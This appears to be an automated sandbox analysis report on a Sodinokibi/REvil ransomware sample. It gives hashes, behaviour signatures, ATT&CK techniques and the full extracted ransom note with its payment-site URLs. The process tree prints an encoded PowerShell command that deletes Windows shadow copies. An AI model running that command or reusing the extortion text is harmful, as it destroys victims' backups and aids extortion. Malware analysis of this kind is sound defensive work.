Analysis

  • max time kernel
    168s
  • max time network
    141s
  • platform
    windows10_x64
  • resource
    win10-en-20211208
  • submitted
    24-01-2022 01:37

General

  • Target

    8b4910be59f9ac6d9040e0199f95d59438c787ad3ea15bdfeb853ddfef47d613.exe

  • Size

    167KB

  • MD5

    b2c98aa89f603996adeef3a7e9e1686f

  • SHA1

    095d904e359e0137f3e0cda769910c90e73d74ed

  • SHA256

    8b4910be59f9ac6d9040e0199f95d59438c787ad3ea15bdfeb853ddfef47d613

  • SHA512

    87edb882b828e20521c1ceffd20ea53f50e88b8263e39b8c0cfb15339501ebb3bf800e97c218b49e28fd0f283c75f2dc893d5ee72f698c5a983274c1bba23614

Malware Config

Extracted

Path

C:\l9m23067-readme.txt

Family

sodinokibi

Ransom Note
---=== Welcome. Again. ===--- [+] Whats Happen? [+] Your files are encrypted, and currently unavailable. You can check it: all files on you computer has expansion l9m23067. By the way, everything is possible to recover (restore), but you need to follow our instructions. Otherwise, you cant return your data (NEVER). [+] What guarantees? [+] Its just a business. We absolutely do not care about you and your deals, except getting benefits. If we do not do our work and liabilities - nobody will not cooperate with us. Its not in our interests. To check the ability of returning files, You should go to our website. There you can decrypt one file for free. That is our guarantee. If you will not cooperate with our service - for us, its does not matter. But you will lose your time and data, cause just we have the private key. In practise - time is much more valuable than money. [+] How to get access on website? [+] You have two ways: 1) [Recommended] Using a TOR browser! a) Download and install TOR browser from this site: https://torproject.org/ b) Open our website: http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/A58D70D4FD4A1AD8 2) If TOR blocked in your country, try to use VPN! But you can use our secondary website. For this: a) Open your any browser (Chrome, Firefox, Opera, IE, Edge) b) Open our secondary website: http://decryptor.cc/A58D70D4FD4A1AD8 Warning: secondary website can be blocked, thats why first variant much better and more available. When you open our website, put the following data in the input form: Key: una1B3FA3vC93smsjWW6TTKvo2z4IkhUuRGTji6oNH0ZR6L1xe1KCIQ7w14gG6JC cRm3EigV6yC/U+mNdnovqAemrmuj7QW48ldArJDzbIWmGLGIt3XrOTmRU2EZ5dqN 6Tgq91yrVg/vEaJx4zAIR0ghVVNcBimsl58QSq+5LgzHgMi+qBdbNhcg4V+4PCE5 ZFm+KhGdkdB/WhaCOVRraP47xCVTLg7PFABRt/a7fYgQg9rHy3yJG0WGXSdyNLjE X/R/KpDJl1oFDCfj+gkMgalv1TxcPZZyRsifTkNHefIaov7AzwZADCqvBDqZKfqn YNTzXO76+cuMUPu1Mp/A5wdrfvQUu6Nwb/94aeSDpiLG8lnhRRkvNO3skbyKCFrh 5hAYm5uqNjG5gBNGl6sIg6H4mzi6sGkLvCyyF2TqNCAIqmGImRhvp18vZPCzi9P0 GLtHeuHsXx4lXTfaYGUZJUZGclxE/izJVw8kSkLNQjBdkjmAqFHsM4xCeknKR8d2 JElfZCjhmkACCu4rpcqbelzVLqNGSL+GDueAGATIVUcSJ6jh14D6Ql6v6pqygpcm 4ZPOH4XXurzhY/NxZNwc8UHhz4Dqiw4qIC9WH9/YGQU5btzkfFhYVvZMjy0nZka4 sqQ9Tni1UzM+0S0xNUsWWEzLf7NJb2DobEeYo7aktvcfNdXaRyP/C3PIAml81nWb LHzTYtpO6OLH1Ifb9FZjs8/QuNcy04AvblrFxYJx4l4sgWfgLDSvoA7tOHSX3lNq 70E1nUf9Nk39rK5XQs8h5Yg7vxzjOz6PyIYwSN/dbhF/j68IaoKSSov3aW3uAP/Z uRr/9cOUKj/xF37VyJ95GkNQ08N7sWuZ2iMCgBMvkguBLWqnaxF1mDT1/Hhj75OG PuBMKMk7ZSfqKhZKD/E7r8GxLWh59dW1czzCYVsMNNcOAeP0OKMpi5KbNXah2MFb te4eY3IzMM/FfJPh9o5ws3RqLpRrVYDO1Fooox97YJ/ej2DT6r/m+qS5y/atarTl Kc1Cmnm5jkF6DPECwyIwZCtE4AtBfmhTe7i1V8f+8cdKcZUJB0eAw0QctbmUUN3u tUNqBboiLkdUU6CLJliOU+7QqBCLHwte9Cne7znxemjcEf5pYOii3FuVDJkOXNeI 5S0HbiehcyYolHYR2OqjDX1J2+9sdgZJe3fBRkaiZoW8JDvj8+jLh05jQxRHEbps CloyoRBhPG+3ZjE4a1qKSqa0uRvqAGOgDh0bZxhB8El5zuMRZQwBOPO+kbrb3EAm JmzRI+3rTNjppkGbPVivUgMXih8= Extension name: l9m23067 ----------------------------------------------------------------------------------------- !!! DANGER !!! DONT try to change files by yourself, DONT use any third party software for restoring your data or antivirus solutions - its may entail damge of the private key and, as result, The Loss all data. !!! !!! !!! ONE MORE TIME: Its in your interests to get your files back. From our side, we (the best specialists) make everything for restoring, but please should not interfere. !!! !!! !!!
URLs

http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/A58D70D4FD4A1AD8

http://decryptor.cc/A58D70D4FD4A1AD8

Signatures

  • Sodin,Sodinokibi,REvil

    Ransomware with advanced anti-analysis and privilege escalation functionality.

  • Adds Run key to start application 2 TTPs 2 IoCs
  • Enumerates connected drives 3 TTPs 24 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Drops file in Program Files directory 12 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious use of AdjustPrivilegeToken 6 IoCs
  • Suspicious use of WriteProcessMemory 2 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\8b4910be59f9ac6d9040e0199f95d59438c787ad3ea15bdfeb853ddfef47d613.exe
    "C:\Users\Admin\AppData\Local\Temp\8b4910be59f9ac6d9040e0199f95d59438c787ad3ea15bdfeb853ddfef47d613.exe"
    1⤵
    • Adds Run key to start application
    • Enumerates connected drives
    • Drops file in Program Files directory
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:2828
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -e RwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAkAF8ALgBEAGUAbABlAHQAZQAoACkAOwB9AA==
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:224
  • C:\Windows\system32\wbem\unsecapp.exe
    C:\Windows\system32\wbem\unsecapp.exe -Embedding
    1⤵
      PID:516
    • C:\Windows\system32\vssvc.exe
      C:\Windows\system32\vssvc.exe
      1⤵
      • Suspicious use of AdjustPrivilegeToken
      PID:1324

    Network

    MITRE ATT&CK Matrix ATT&CK v6

    Persistence

    Registry Run Keys / Startup Folder

    1
    T1060

    Defense Evasion

    Modify Registry

    1
    T1112

    Discovery

    Query Registry

    1
    T1012

    Peripheral Device Discovery

    1
    T1120

    System Information Discovery

    1
    T1082

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • memory/224-120-0x0000024DF9250000-0x0000024DF9272000-memory.dmp
      Filesize

      136KB

    • memory/224-124-0x0000024DF9310000-0x0000024DF9312000-memory.dmp
      Filesize

      8KB

    • memory/224-125-0x0000024DF9313000-0x0000024DF9315000-memory.dmp
      Filesize

      8KB

    • memory/224-126-0x0000024DF9420000-0x0000024DF9496000-memory.dmp
      Filesize

      472KB